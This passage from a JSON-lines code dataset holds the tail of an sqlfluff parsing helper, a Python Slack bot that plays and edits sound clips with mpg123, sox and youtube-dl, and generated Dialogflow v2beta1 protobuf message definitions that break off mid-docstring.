linter = Linter(dialect=dialect)\n parsed = linter.parse_string(sql)\n # If we encounter any parsing errors, raise them in a combined issue.\n if parsed.violations:\n raise APIParsingError(parsed.violations)\n return parsed\n","sub_path":"src/sqlfluff/api/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"55468999","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport time\nimport traceback\nimport subprocess\nimport string\nfrom datetime import datetime\nfrom distutils.util import strtobool\nimport os\nimport re\nimport json\nimport urllib.request, urllib.error, urllib.parse\n\nfrom slack_bolt import App\nfrom slack_bolt.adapter.socket_mode import SocketModeHandler\n\n\nBASE_DIR = os.path.dirname(os.path.realpath(__file__))\nSOUNDS_DIR = os.path.join(BASE_DIR, 'sounds')\nCONFIG_FILE = os.path.join(BASE_DIR, 'config.json')\nLOGGING_FILE = os.path.join(BASE_DIR, 'commands.log')\nVALID_CHARS = string.ascii_letters + string.digits + \" .'_-\"\nFOLDER_SEP = ':/|'\nPLAYER = 'mpg123'\nFILETYPE = 'mp3'\nEQUALIZER = ['mp3gain', '-r']\nPAD_SILENCE = ['sox', 'in.mp3', 'out.mp3', 'pad', '0.5', '0']\nTRIM = ['sox', 'in.mp3', 'out.mp3', 'trim', 'from', 'to']\nFADE = ['sox', 'in.mp3', 'out.mp3', 'fade', '0', '-0', '2']\nYOUTUBE_DOWNLOAD = ['youtube-dl', '--extract-audio', '--audio-format', 'mp3', 'url', '-o', '{}.%(ext)s']\n\nDEFAULT_OPTIONS = {\n \"_token\": None,\n \"throttling\": True,\n \"throttling_reset\": 10 * 60,\n \"throttling_count\": 5,\n \"default_ban_length\": 30,\n}\n\nPLAY_REGEX = re.compile(\"play\\s([a-z0-9_' ]+)\", re.IGNORECASE)\nREMOVE_REGEX = re.compile(\"remove\\s([a-z0-9_' ]+)\", re.IGNORECASE)\nUPDATE_CONF_REGEX = re.compile(\"^set\\s([A-Z0-9_]+)\\sto\\s([A-Z0-9_]+)$\", re.IGNORECASE)\nSHOW_CONF_REGEX = re.compile(\"^show\\sconf$\", re.IGNORECASE)\nLIST_SOUNDS_REGEX = re.compile(\"list\\ssounds\", re.IGNORECASE)\nPUNISH_USER_REGEX = re.compile(\"punish\\s?\\s?(\\d+)?\", re.IGNORECASE)\nHELP_REGEX = re.compile(\"^help$\", re.IGNORECASE)\nSHOW_LOGS_REGEX = re.compile(\"^show\\slogs$\", re.IGNORECASE)\nTRIM_REGEX = re.compile(\"^trim\\s([a-z0-9_' ]+)\\s([\\d\\.]+)\\s([\\d\\.]+)$\", re.IGNORECASE)\nFADE_OUT_REGEX = re.compile(\"^fade\\s([a-z0-9_' ]+)$\", re.IGNORECASE)\nYOUTUBE_REGEX = re.compile(\"^download\\s?\\s([a-z0-9_' :/|]+)$\", re.IGNORECASE)\nPAD_REGEX = re.compile(\"^pad\\s([a-z0-9_' ]+)$\", re.IGNORECASE)\n\n\nusers = {}\nthrottling_record = {}\npunished = {}\nlogs = []\nconfig = {}\nwith open(CONFIG_FILE, 'r') as f:\n config = json.loads(f.read())\nfor key, value in DEFAULT_OPTIONS.items():\n config.setdefault(key, value)\napp = App(token=config[\"oauth_token\"])\n\n\ndef write_config(config):\n with open(CONFIG_FILE, 'w') as f:\n f.write(json.dumps(config))\n\n\ndef find_sound(sound_name):\n directories = (file_ for file_ in os.listdir(SOUNDS_DIR)\n if os.path.isdir(os.path.join(SOUNDS_DIR, file_)))\n for d in directories:\n path = os.path.join(SOUNDS_DIR, d, '{}.{}'.format(sound_name.replace(' ', '_'), FILETYPE))\n if os.path.isfile(path):\n return path\n\n\ndef play_action(match, user, config):\n sound_name = match.group(1).strip()\n sound_file = find_sound(sound_name)\n\n def throttle():\n if not config[\"throttling\"] or user[\"is_admin\"]:\n return False, None\n record = throttling_record.get(user[\"name\"], {\"time\": time.time(), \"count\": 0})\n if (time.time() - record[\"time\"]) < config[\"throttling_reset\"]:\n record[\"count\"] += 1\n else:\n record[\"count\"] = 1\n record[\"time\"] = time.time()\n throttling_record[user[\"name\"]] = record\n return record[\"count\"] > config[\"throttling_count\"], record\n\n def check_punished():\n if user[\"is_admin\"]:\n return False\n release = punished.get(user[\"name\"], time.time())\n if release > time.time():\n return release\n return False\n\n if sound_file:\n throttled, record = throttle()\n punished_release = check_punished()\n if throttled:\n message = 'You reached your throttling limit. Try again later.'\n elif punished_release:\n message = 'You have been punished ! No sounds until {}.'.format(datetime.fromtimestamp(punished_release).strftime('%H:%M:%S'))\n else:\n logs.append((user, sound_name, time.time()))\n message = 'Playing ' + sound_name\n subprocess.Popen([PLAYER, \"{}\".format(sound_file)])\n if record:\n message += '\\n {} plays left. Reset at {}.'.format(\n max(config[\"throttling_count\"] - record[\"count\"], 0),\n datetime.fromtimestamp(record[\"time\"] + config[\"throttling_reset\"]).strftime('%H:%M:%S')\n )\n else:\n message = 'No sound matching ' + sound_name\n return message\n\n\ndef remove_action(match, user, config):\n if not user[\"is_admin\"]:\n return\n sound_name = match.group(1).strip()\n sound_file = find_sound(sound_name)\n if sound_file:\n os.remove(sound_file)\n message = 'Removed ' + sound_name\n else:\n message = 'No sound matching ' + sound_name\n return message\n\n\ndef show_logs_action(match, user, config):\n return '\\n'.join(['{} played {} at {}'.format(l[0]['name'], l[1], datetime.fromtimestamp(l[2]).strftime('%H:%M:%S'))\n for l in logs[-10:]])\n\n\ndef list_sounds_action(match, user, config):\n message = '```\\nAvailable sounds are :\\n'\n directories = sorted(file_ for file_ in os.listdir(SOUNDS_DIR)\n if os.path.isdir(os.path.join(SOUNDS_DIR, file_)))\n\n def split_by_cols(l, n=4):\n output = ''\n for row in (l[i:i + n] for i in range(0, len(l), n)):\n fmt = \"| {:<30s} \" * len(row)\n output += fmt.format(*row) + '\\n'\n return output\n\n for directory in directories:\n message += '\\n' + directory.upper() + ':\\n'\n sounds = sorted(s.split('.')[0].replace('_', ' ') for s in os.listdir(os.path.join(SOUNDS_DIR, directory)))\n message += split_by_cols(sounds)\n\n message += '```'\n return message\n\n\ndef show_conf_action(match, user, config):\n if not user[\"is_admin\"]:\n return\n message = ''\n for key, value in config.items():\n message += '{}: {}\\n'.format(key, value)\n return message\n\n\ndef show_help_action(match, user, config):\n message = \"\"\"\nWelcome to sounds, the bot that brings fun to your team.\nTo interact with the bot, simply use these commands:\n list sounds: shows the full list of all the sounds available\n play replace_with_sound: plays the sound you chose from the list\n show logs: shows a list who played the last 10 sounds\n pad replace_with_sound: adds 0.5s at the beginning of the sound\n trim replace_with_sound 2.5 10: trim the selected sound to be only between 2.5 and 10 seconds\n fade replace_with_sound: adds a 1s fadeout on your sound\n download replace_with_youtube_url replace_with_sound: downloads a sound from youtube\n help: shows this help\"\"\"\n if user[\"is_admin\"]:\n message += \"\"\"\n remove sound_name: removes the sound from the list\n show conf: show the config variables\n set x to y: updates the x config variable with y value\n punish @user 30: prevent user from playing a sound for 30 minutes\"\"\"\n message += \"\"\"\nHow to upload a sound ?\nIn the bot channel, upload your mp3 file. This file should already be cut properly and have 0.5s of silence at the beginning.\nYou can use various websites like sonyoutube.com to convert a youtube video to an mp3 file and then use a software like audacity or a website like audiotrimmer.com to edit it.\nBe sure you filename ends with .mp3 and if you want to put your file in a specific folder separate the folder from the filename like so folder:filename.mp3\n\nThat's it with the instructions, have fun !\"\"\"\n return message\n\n\ndef update_conf_action(match, user, config):\n if not user[\"is_admin\"]:\n return\n key = match.group(1)\n value = match.group(2)\n if key.startswith('_'):\n return \"Can't set private variables\"\n try:\n value = int(value)\n except ValueError:\n try:\n value = bool(strtobool(value))\n except ValueError:\n pass\n config[key] = value\n write_config(config)\n return \"Config set\"\n\n\ndef punish_user_action(match, user, config):\n if not user[\"is_admin\"]:\n return\n who = match.group(1)\n r = users[who]\n if r:\n who = r\n else:\n return \"Couldn't find user {}\".format(user)\n try:\n how_long = int(match.group(2) or config.get('default_ban_length'))\n except ValueError:\n how_long = 30\n punished[who[\"name\"]] = time.time() + how_long * 60\n return \"{} has been punished for {} minutes.\".format(who[\"name\"], how_long)\n\n\ndef trim_action(match, user, config):\n sound_name = match.group(1).strip()\n sound_file = find_sound(sound_name)\n if sound_file:\n tmp_file = '__NEW__' + os.path.basename(sound_file)\n trim_command = list(TRIM)\n trim_command[1] = sound_file\n trim_command[2] = tmp_file\n trim_command[4] = match.group(2)\n trim_command[5] = '=' + match.group(3)\n process = subprocess.Popen(trim_command)\n process.wait()\n os.rename(tmp_file, sound_file)\n message = 'Trimmed ' + sound_name\n else:\n message = 'No sound matching ' + sound_name\n return message\n\n\ndef pad_action(match, user, config):\n sound_name = match.group(1).strip()\n sound_file = find_sound(sound_name)\n if sound_file:\n tmp_file = '__NEW__' + os.path.basename(sound_file)\n pad_command = list(PAD_SILENCE)\n pad_command[1] = sound_file\n pad_command[2] = tmp_file\n process = subprocess.Popen(pad_command)\n process.wait()\n os.rename(tmp_file, sound_file)\n message = 'Padded ' + sound_name\n else:\n message = 'No sound matching ' + sound_name\n return message\n\n\ndef fade_out_action(match, user, config):\n sound_name = match.group(1).strip()\n sound_file = find_sound(sound_name)\n if sound_file:\n tmp_file = '__NEW__' + os.path.basename(sound_file)\n fade_command = list(FADE)\n fade_command[1] = sound_file\n fade_command[2] = tmp_file\n process = subprocess.Popen(fade_command)\n process.wait()\n os.rename(tmp_file, sound_file)\n message = 'Faded ' + sound_name\n else:\n message = 'No sound matching ' + sound_name\n return message\n\n\ndef slugify(raw):\n return \"\".join([x for x in raw if x in VALID_CHARS]).replace(\"-\", \"_\").strip().replace(\" \", \"_\").lower()\n\n\ndef download_action(match, user, config):\n url = match.group(1)\n filename = match.group(2)\n folder = 'misc'\n for sep in FOLDER_SEP:\n if sep in filename:\n folder, filename = filename.split(sep)\n break\n if filename.endswith('.mp3'):\n filename = filename[:-4]\n filename = slugify(filename)\n\n dl_command = list(YOUTUBE_DOWNLOAD)\n dl_command[-1] = dl_command[-1].format(filename)\n dl_command[-3] = url\n process = subprocess.Popen(dl_command)\n process.wait()\n\n path_to_sound = os.path.join(SOUNDS_DIR, slugify(folder), filename + '.mp3')\n try:\n os.makedirs(os.path.join(SOUNDS_DIR, slugify(folder)))\n except OSError:\n pass\n os.rename(filename + '.mp3', path_to_sound)\n subprocess.Popen(EQUALIZER + [path_to_sound])\n return \"Sound added correctly\"\n\n\ndef add_sound(sc, file_id, config):\n info = sc.files_info(file=file_id)\n file_url = info.get(\"file\").get(\"url_private\") if info[\"ok\"] else ''\n filename = info.get(\"file\").get(\"title\") if info[\"ok\"] else ''\n if filename.endswith('.mp3') and file_url.endswith('.mp3'):\n folder = 'misc'\n for sep in FOLDER_SEP:\n if sep in filename:\n folder, filename = filename.split(sep)\n break\n try:\n os.makedirs(os.path.join(SOUNDS_DIR, slugify(folder)))\n except OSError:\n pass\n req = urllib.request.Request(file_url, headers={\"Authorization\": \"Bearer \" + config[\"_token\"]})\n path_to_sound = os.path.join(SOUNDS_DIR, slugify(folder), slugify(filename))\n with open(path_to_sound, 'w+') as f:\n f.write(urllib.request.urlopen(req).read())\n subprocess.Popen(EQUALIZER + [path_to_sound])\n\n\nACTIONS = {\n PLAY_REGEX: play_action,\n REMOVE_REGEX: remove_action,\n UPDATE_CONF_REGEX: update_conf_action,\n SHOW_CONF_REGEX: show_conf_action,\n PUNISH_USER_REGEX: punish_user_action,\n HELP_REGEX: show_help_action,\n LIST_SOUNDS_REGEX: list_sounds_action,\n SHOW_LOGS_REGEX: show_logs_action,\n YOUTUBE_REGEX: download_action,\n PAD_REGEX: pad_action,\n TRIM_REGEX: trim_action,\n FADE_OUT_REGEX: fade_out_action,\n}\n\n\ndef load_users(sc):\n user_list = []\n\n def paginated_api_call(cursor=None):\n response = sc.users_list(cursor=cursor)\n user_list.extend(response.get(\"members\", []))\n if response.get(\"response_metadata\", {}).get(\"next_cursor\"):\n paginated_api_call(response[\"response_metadata\"][\"next_cursor\"])\n\n paginated_api_call()\n for user in user_list:\n users[user[\"id\"]] = {\n \"name\": user[\"name\"],\n \"is_admin\": user.get(\"is_admin\", False) or user[\"id\"] in config.get(\"admins\", []),\n \"id\": user[\"id\"]\n }\n\n@app.event(\"file_created\")\n@app.event(\"file_shared\")\ndef file_uploaded(event, **kwargs):\n file_id = event.get('file', {}).get('id', None)\n if file_id:\n add_sound(app._client, file_id, config)\n\n\n@app.event(\"message\")\ndef message_received(event, **kwargs):\n text = event.get('text', '').replace('’', \"'\")\n user = users.get(event.get('user', None), None)\n channel = event.get('channel', None)\n if not user or not text or not channel:\n return\n\n message = None\n for regex, action in ACTIONS.items():\n match = regex.match(text)\n if match:\n message = action(match, user, config)\n if message:\n app._client.chat_postEphemeral(channel=channel, text=message, user=user[\"id\"])\n break\n\n\ndef start():\n handler = SocketModeHandler(app, config[\"app_token\"])\n load_users(app._client)\n bot_id = app._client.auth_test()[\"user_id\"]\n handler.start()\n\n\n\nif __name__ == '__main__':\n while True:\n try:\n start()\n except Exception as e:\n traceback.print_exc()\n time.sleep(30)","sub_path":"sounds.py","file_name":"sounds.py","file_ext":"py","file_size_in_byte":14185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"48862321","text":"# -*- coding: utf-8 -*-\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport proto # type: ignore\n\nfrom google.cloud.dialogflow_v2beta1.types import audio_config\nfrom google.cloud.dialogflow_v2beta1.types import session\nfrom google.protobuf import field_mask_pb2 # type: ignore\nfrom google.protobuf import struct_pb2 # type: ignore\nfrom google.protobuf import timestamp_pb2 # type: ignore\nfrom google.rpc import status_pb2 # type: ignore\n\n\n__protobuf__ = proto.module(\n package=\"google.cloud.dialogflow.v2beta1\",\n manifest={\n \"Participant\",\n \"Message\",\n \"CreateParticipantRequest\",\n \"GetParticipantRequest\",\n \"ListParticipantsRequest\",\n \"ListParticipantsResponse\",\n \"UpdateParticipantRequest\",\n \"OutputAudio\",\n \"AutomatedAgentReply\",\n \"SuggestionFeature\",\n \"AnalyzeContentRequest\",\n \"DtmfParameters\",\n \"AnalyzeContentResponse\",\n \"AnnotatedMessagePart\",\n \"MessageAnnotation\",\n \"ArticleAnswer\",\n \"FaqAnswer\",\n \"SmartReplyAnswer\",\n \"SuggestionResult\",\n \"SuggestArticlesRequest\",\n \"SuggestArticlesResponse\",\n \"SuggestFaqAnswersRequest\",\n \"SuggestFaqAnswersResponse\",\n \"SuggestSmartRepliesRequest\",\n \"SuggestSmartRepliesResponse\",\n \"Suggestion\",\n \"ListSuggestionsRequest\",\n \"ListSuggestionsResponse\",\n \"CompileSuggestionRequest\",\n \"CompileSuggestionResponse\",\n \"ResponseMessage\",\n },\n)\n\n\nclass Participant(proto.Message):\n r\"\"\"Represents a conversation participant (human agent, virtual\n agent, end-user).\n\n Attributes:\n name (str):\n Optional. The unique identifier of this participant. Format:\n ``projects//locations//conversations//participants/``.\n role (google.cloud.dialogflow_v2beta1.types.Participant.Role):\n Immutable. The role this participant plays in\n the conversation. This field must be set during\n participant creation and is then immutable.\n obfuscated_external_user_id (str):\n Optional. Obfuscated user id that should be associated with\n the created participant.\n\n You can specify a user id as follows:\n\n 1. If you set this field in\n [CreateParticipantRequest][google.cloud.dialogflow.v2beta1.CreateParticipantRequest.participant]\n or\n [UpdateParticipantRequest][google.cloud.dialogflow.v2beta1.UpdateParticipantRequest.participant],\n Dialogflow adds the obfuscated user id with the\n participant.\n\n 2. If you set this field in\n [AnalyzeContent][google.cloud.dialogflow.v2beta1.AnalyzeContentRequest.obfuscated_external_user_id]\n or\n [StreamingAnalyzeContent][google.cloud.dialogflow.v2beta1.StreamingAnalyzeContentRequest.obfuscated_external_user_id],\n Dialogflow will update\n [Participant.obfuscated_external_user_id][google.cloud.dialogflow.v2beta1.Participant.obfuscated_external_user_id].\n\n Dialogflow uses this user id for following purposes:\n\n 1) Billing and measurement. If user with the same\n obfuscated_external_user_id is created in a later\n conversation, dialogflow will know it's the same user. 2)\n Agent assist suggestion personalization. For example,\n Dialogflow can use it to provide personalized smart reply\n suggestions for this user.\n\n Note:\n\n - Please never pass raw user ids to Dialogflow. Always\n obfuscate your user id first.\n - Dialogflow only accepts a UTF-8 encoded string, e.g., a\n hex digest of a hash function like SHA-512.\n - The length of the user id must be <= 256 characters.\n \"\"\"\n\n class Role(proto.Enum):\n r\"\"\"Enumeration of the roles a participant can play in a\n conversation.\n \"\"\"\n ROLE_UNSPECIFIED = 0\n HUMAN_AGENT = 1\n AUTOMATED_AGENT = 2\n END_USER = 3\n\n name = proto.Field(proto.STRING, number=1,)\n role = proto.Field(proto.ENUM, number=2, enum=Role,)\n obfuscated_external_user_id = proto.Field(proto.STRING, number=7,)\n\n\nclass Message(proto.Message):\n r\"\"\"Represents a message posted into a conversation.\n Attributes:\n name (str):\n Optional. The unique identifier of the message. Format:\n ``projects//locations//conversations//messages/``.\n content (str):\n Required. The message content.\n language_code (str):\n Optional. The message language. This should be a\n `BCP-47 `__\n language tag. Example: \"en-US\".\n participant (str):\n Output only. The participant that sends this\n message.\n participant_role (google.cloud.dialogflow_v2beta1.types.Participant.Role):\n Output only. The role of the participant.\n create_time (google.protobuf.timestamp_pb2.Timestamp):\n Output only. The time when the message was\n created in Contact Center AI.\n send_time (google.protobuf.timestamp_pb2.Timestamp):\n Optional. The time when the message was sent.\n message_annotation (google.cloud.dialogflow_v2beta1.types.MessageAnnotation):\n Output only. The annotation for the message.\n sentiment_analysis (google.cloud.dialogflow_v2beta1.types.SentimentAnalysisResult):\n Output only. The sentiment analysis result\n for the message.\n \"\"\"\n\n name = proto.Field(proto.STRING, number=1,)\n content = proto.Field(proto.STRING, number=2,)\n language_code = proto.Field(proto.STRING, number=3,)\n participant = proto.Field(proto.STRING, number=4,)\n participant_role = proto.Field(proto.ENUM, number=5, enum=\"Participant.Role\",)\n create_time = proto.Field(proto.MESSAGE, number=6, message=timestamp_pb2.Timestamp,)\n send_time = proto.Field(proto.MESSAGE, number=9, message=timestamp_pb2.Timestamp,)\n message_annotation = proto.Field(\n proto.MESSAGE, number=7, message=\"MessageAnnotation\",\n )\n sentiment_analysis = proto.Field(\n proto.MESSAGE, number=8, message=session.SentimentAnalysisResult,\n )\n\n\nclass CreateParticipantRequest(proto.Message):\n r\"\"\"The request message for\n [Participants.CreateParticipant][google.cloud.dialogflow.v2beta1.Participants.CreateParticipant].\n\n Attributes:\n parent (str):\n Required. Resource identifier of the conversation adding the\n participant. Format:\n ``projects//locations//conversations/``.\n participant (google.cloud.dialogflow_v2beta1.types.Participant):\n Required. The participant to create.\n \"\"\"\n\n parent = proto.Field(proto.STRING, number=1,)\n participant = proto.Field(proto.MESSAGE, number=2, message=\"Participant\",)\n\n\nclass GetParticipantRequest(proto.Message):\n r\"\"\"The request message for\n [Participants.GetParticipant][google.cloud.dialogflow.v2beta1.Participants.GetParticipant].\n\n Attributes:\n name (str):\n Required. The name of the participant. Format:\n ``projects//locations//conversations//participants/``.\n \"\"\"\n\n name = proto.Field(proto.STRING, number=1,)\n\n\nclass ListParticipantsRequest(proto.Message):\n r\"\"\"The request message for\n [Participants.ListParticipants][google.cloud.dialogflow.v2beta1.Participants.ListParticipants].\n\n Attributes:\n parent (str):\n Required. The conversation to list all participants from.\n Format:\n ``projects//locations//conversations/``.\n page_size (int):\n Optional. The maximum number of items to\n return in a single page. By default 100 and at\n most 1000.\n page_token (str):\n Optional. The next_page_token value returned from a previous\n list request.\n \"\"\"\n\n parent = proto.Field(proto.STRING, number=1,)\n page_size = proto.Field(proto.INT32, number=2,)\n page_token = proto.Field(proto.STRING, number=3,)\n\n\nclass ListParticipantsResponse(proto.Message):\n r\"\"\"The response message for\n [Participants.ListParticipants][google.cloud.dialogflow.v2beta1.Participants.ListParticipants].\n\n Attributes:\n participants (Sequence[google.cloud.dialogflow_v2beta1.types.Participant]):\n The list of participants. There is a maximum number of items\n returned based on the page_size field in the request.\n next_page_token (str):\n Token to retrieve the next page of results or\n empty if there are no more results in the list.\n \"\"\"\n\n @property\n def raw_page(self):\n return self\n\n participants = proto.RepeatedField(proto.MESSAGE, number=1, message=\"Participant\",)\n next_page_token = proto.Field(proto.STRING, number=2,)\n\n\nclass UpdateParticipantRequest(proto.Message):\n r\"\"\"The request message for\n [Participants.UpdateParticipant][google.cloud.dialogflow.v2beta1.Participants.UpdateParticipant].\n\n Attributes:\n participant (google.cloud.dialogflow_v2beta1.types.Participant):\n Required. The participant to update.\n update_mask (google.protobuf.field_mask_pb2.FieldMask):\n Required. The mask to specify which fields to\n update.\n \"\"\"\n\n participant = proto.Field(proto.MESSAGE, number=1, message=\"Participant\",)\n update_mask = proto.Field(\n proto.MESSAGE, number=2, message=field_mask_pb2.FieldMask,\n )\n\n\nclass OutputAudio(proto.Message):\n r\"\"\"Represents the natural language speech audio to be played to\n the end user.\n\n Attributes:\n config (google.cloud.dialogflow_v2beta1.types.OutputAudioConfig):\n Required. Instructs the speech synthesizer\n how to generate the speech audio.\n audio (bytes):\n Required. The natural language speech audio.\n \"\"\"\n\n config = proto.Field(\n proto.MESSAGE, number=1, message=audio_config.OutputAudioConfig,\n )\n audio = proto.Field(proto.BYTES, number=2,)\n\n\nclass AutomatedAgentReply(proto.Message):\n r\"\"\"Represents a response from an automated agent.\n Attributes:\n detect_intent_response (google.cloud.dialogflow_v2beta1.types.DetectIntentResponse):\n Response of the Dialogflow\n [Sessions.DetectIntent][google.cloud.dialogflow.v2beta1.Sessions.DetectIntent]\n call.\n response_messages (Sequence[google.cloud.dialogflow_v2beta1.types.ResponseMessage]):\n Response messages from the automated agent.\n intent (str):\n Name of the intent if an intent is matched for the query.\n For a V2 query, the value format is\n ``projects//locations/ /agent/intents/``.\n For a V3 query, the value format is\n ``projects//locations/ /agents//intents/``.\n event (str):\n Event name if an event is triggered for the\n query.\n cx_session_parameters (google.protobuf.struct_pb2.Struct):\n The collection of current Dialogflow CX agent\n session parameters at the time of this response.\n \"\"\"\n\n detect_intent_response = proto.Field(\n proto.MESSAGE, number=1, oneof=\"response\", message=session.DetectIntentResponse,\n )\n response_messages = proto.RepeatedField(\n proto.MESSAGE, number=3, message=\"ResponseMessage\",\n )\n intent = proto.Field(proto.STRING, number=4, oneof=\"match\",)\n event = proto.Field(proto.STRING, number=5, oneof=\"match\",)\n cx_session_parameters = proto.Field(\n proto.MESSAGE, number=6, message=struct_pb2.Struct,\n )\n\n\nclass SuggestionFeature(proto.Message):\n r\"\"\"The type of Human Agent Assistant API suggestion to perform, and the\n maximum number of results to return for that type. Multiple\n ``Feature`` objects can be specified in the ``features`` list.\n\n Attributes:\n type_ (google.cloud.dialogflow_v2beta1.types.SuggestionFeature.Type):\n Type of Human Agent Assistant API feature to\n request.\n \"\"\"\n\n class Type(proto.Enum):\n r\"\"\"Defines the type of Human Agent Assistant feature.\"\"\"\n TYPE_UNSPECIFIED = 0\n ARTICLE_SUGGESTION = 1\n FAQ = 2\n SMART_REPLY = 3\n\n type_ = proto.Field(proto.ENUM, number=1, enum=Type,)\n\n\nclass AnalyzeContentRequest(proto.Message):\n r\"\"\"The request message for\n [Participants.AnalyzeContent][google.cloud.dialogflow.v2beta1.Participants.AnalyzeContent].\n\n Attributes:\n participant (str):\n Required. The name of the participant this text comes from.\n Format:\n ``projects//locations//conversations//participants/``.\n text_input (google.cloud.dialogflow_v2beta1.types.TextInput):\n The natural language text to be processed.\n event_input (google.cloud.dialogflow_v2beta1.types.EventInput):\n An input event to send to Dialogflow.\n reply_audio_config (google.cloud.dialogflow_v2beta1.types.OutputAudioConfig):\n Speech synthesis configuration.\n The speech synthesis settings for a virtual\n agent that may be configured for the associated\n conversation profile are not used when calling\n AnalyzeContent. If this configuration is not\n supplied, speech synthesis is disabled.\n query_params (google.cloud.dialogflow_v2beta1.types.QueryParameters):\n Parameters for a Dialogflow virtual-agent\n query.\n message_send_time (google.protobuf.timestamp_pb2.Timestamp):\n Optional. The send time of the message from\n end user or human agent's perspective. It is\n used for identifying the same message under one\n participant.\n\n Given two messages under the same participant:\n - If send time are different regardless of\n whether the content of the messages are exactly\n the same, the conversation will regard them as\n two distinct messages sent by the participant.\n - If send time is the same regardless of whether\n the content of the messages are exactly the\n same, the conversation will regard them as same\n message, and ignore the message received later.\n If the value is not provided, a new request will\n always be regarded as a new message without any\n de-duplication.\n request_id (str):\n A unique identifier for this request. Restricted to 36 ASCII\n characters. A random UUID is recommended. This request is\n only idempotent if a ``request_id`` is provided.\n \"\"\"\n\n participant = proto.Field(proto.STRING, number=1,)\n text_input = proto.Field(\n proto.MESSAGE, number=6, oneof=\"input\", message=session.TextInput,\n )\n event_input = proto.Field(\n proto.MESSAGE, number=8, oneof=\"input\", message=session.EventInput,\n )\n reply_audio_config = proto.Field(\n proto.MESSAGE, number=5, message=audio_config.OutputAudioConfig,\n )\n query_params = proto.Field(\n proto.MESSAGE, number=9, message=session.QueryParameters,\n )\n message_send_time = proto.Field(\n proto.MESSAGE, number=10, message=timestamp_pb2.Timestamp,\n )\n request_id = proto.Field(proto.STRING, number=11,)\n\n\nclass DtmfParameters(proto.Message):\n r\"\"\"The message in the response that indicates the parameters of\n DTMF.\n\n Attributes:\n accepts_dtmf_input (bool):\n Indicates whether DTMF input can be handled\n in the next request.\n \"\"\"\n\n accepts_dtmf_input = proto.Field(proto.BOOL, number=1,)\n\n\nclass AnalyzeContentResponse(proto.Message):\n r\"\"\"The response message for\n [Participants.AnalyzeContent][google.cloud.dialogflow.v2beta1.Participants.AnalyzeContent].\n\n Attributes:\n reply_text (str):\n Output only. The output text content.\n This field is set if the automated agent\n responded with text to show to the user.\n reply_audio (google.cloud.dialogflow_v2beta1.types.OutputAudio):\n Optional. The audio data bytes encoded as specified in the\n request. This field is set if:\n\n - ``reply_audio_config`` was specified in the request, or\n - The automated agent responded with audio to play to the\n user. In such case, ``reply_audio.config`` contains\n settings used to synthesize the speech.\n\n In some scenarios, multiple output audio fields may be\n present in the response structure. In these cases, only the\n top-most-level audio output has content.\n automated_agent_reply (google.cloud.dialogflow_v2beta1.types.AutomatedAgentReply):\n Optional. Only set if a Dialogflow automated agent has\n responded. Note that:\n [AutomatedAgentReply.detect_intent_response.output_audio][]\n and\n [AutomatedAgentReply.detect_intent_response.output_audio_config][]\n are always empty, use\n [reply_audio][google.cloud.dialogflow.v2beta1.AnalyzeContentResponse.reply_audio]\n instead.\n message (google.cloud.dialogflow_v2beta1.types.Message):\n Output only. Message analyzed by CCAI.\n human_agent_suggestion_results (Sequence[google.cloud.dialogflow_v2beta1.types.SuggestionResult]):\n The suggestions for most recent human agent. The order is\n the same as\n [HumanAgentAssistantConfig.SuggestionConfig.feature_configs][google.cloud.dialogflow.v2beta1.HumanAgentAssistantConfig.SuggestionConfig.feature_configs]\n of\n [HumanAgentAssistantConfig.human_agent_suggestion_config][google.cloud.dialogflow.v2beta1.HumanAgentAssistantConfig.human_agent_suggestion_config].\n end_user_suggestion_results (Sequence[google.cloud.dialogflow_v2beta1.types.SuggestionResult]):\n The suggestions for end user. The order is the same as\n [HumanAgentAssistantConfig.SuggestionConfig.feature_configs][google.cloud.dialogflow.v2beta1.HumanAgentAssistantConfig.SuggestionConfig.feature_configs]\n of\n [HumanAgentAssistantConfig.end_user_suggestion_config][google.cloud.dialogflow.v2beta1.HumanAgentAssistantConfig.end_user_suggestion_config].\n dtmf_parameters (google.cloud.dialogflow_v2beta1.types.DtmfParameters):\n Indicates the parameters of DTMF.\n \"\"\"\n\n reply_text = proto.Field(proto.STRING, number=1,)\n reply_audio = proto.Field(proto.MESSAGE, number=2, message=\"OutputAudio\",)\n automated_agent_reply = proto.Field(\n proto.MESSAGE, number=3, message=\"AutomatedAgentReply\",\n )\n message = proto.Field(proto.MESSAGE, number=5, message=\"Message\",)\n human_agent_suggestion_results = proto.RepeatedField(\n proto.MESSAGE, number=6, message=\"SuggestionResult\",\n )\n end_user_suggestion_results = proto.RepeatedField(\n proto.MESSAGE, number=7, message=\"SuggestionResult\",\n )\n dtmf_parameters = proto.Field(proto.MESSAGE, number=9, message=\"DtmfParameters\",)\n\n\nclass AnnotatedMessagePart(proto.Message):\n r\"\"\"Represents a part of a message possibly annotated with an\n entity. The part can be an entity or purely a part of the\n message between two entities or message start/end.\n\n Attributes:\n text (str):\n Required. A part of a message possibly\n annotated with an entity.\n entity_type (str):\n Optional. The `Dialogflow system entity\n type `__\n of this message part. If this is empty, Dialogflow could not\n annotate the phrase part with a system entity.\n formatted_value (google.protobuf.struct_pb2.Value):\n Optional. The `Dialogflow system entity formatted\n value `__\n of this message part. For example for a system entity of\n type ``@sys.unit-currency``, this may contain:\n\n .. raw:: html\n\n
        \n                {\n                  \"amount\": 5,\n                  \"currency\": \"USD\"\n                }\n                
